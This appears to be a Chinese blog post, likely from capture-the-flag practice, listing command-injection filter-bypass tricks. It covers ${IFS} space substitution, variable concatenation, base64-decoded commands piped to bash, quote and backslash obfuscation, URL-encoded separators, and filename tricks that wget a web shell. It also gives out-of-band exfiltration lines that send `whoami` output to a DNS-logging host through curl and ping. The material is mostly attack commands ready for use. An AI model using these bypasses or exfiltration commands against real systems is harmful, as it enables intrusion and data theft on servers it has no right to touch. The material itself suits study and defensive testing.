标签:html 翻页 more 图片 tac 字符串 字段 分隔符 lang
总结一下自己在命令执行这一方面收获的一些小技巧
cat 从第一行开始,显示文件的所有内容
tac 从第最后一行开始,显示文件的所有内容(正好与cat相反)
more 根据窗口大小,一页一页的实现文件内容
less 和more类似,但是优点是是可以往前翻页和搜索字符
head 只显示前几行
tail 只显示后几行
nl 类似于cat -n,显示时输出行号
可以使用${IFS}来进行绕过
echo${IFS}123456
读取文件的时候可以使用重定向符号
cat<>filename
cat<filename
使用拼接法
a=l;b=s;$a$b 执行的就是ls
利用base64编码
echo "d2hvYW1pCg=="|base64 -d 整体用反单引号包一下,我这边是markdown语法。
echo "d2hvYW1pCg=="|base64 -d|bash
使用单双引号
ca''t flag
ca""t flag
ca''t fl''ag
使用反斜线
ca\t fl\ag
Linux自带的一些字符
Linux自带的三种分隔符号
; || &&
${PS2}代表">"
${PS4}代表"+"
${IFS}代表字段分隔符
${9}代表空字符串
可以使用
%0a %0d ; ${IFS} &绕过
命令终止符号
%00 %20#
反弹shell(nc啦,msf啦这里面不在赘述)
dns管道解析
在http://ceye.io/records/http注册一个账号就行了,看一下自己的dns
?
执行
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io
curl `whoami`.i96tvv.ceye.io
在看一下dns的解析记录
?
1>wget1>域名.1>com1>-O1>she1>ll.p1>p
ls>a
sh a
利用文件名进行命令执行6
标签:html 翻页 more 图片 tac 字符串 字段 分隔符 lang
原文地址:https://www.cnblogs.com/Mikasa-Ackerman/p/qian-xiphp-ming-ling-zhi-xing.html
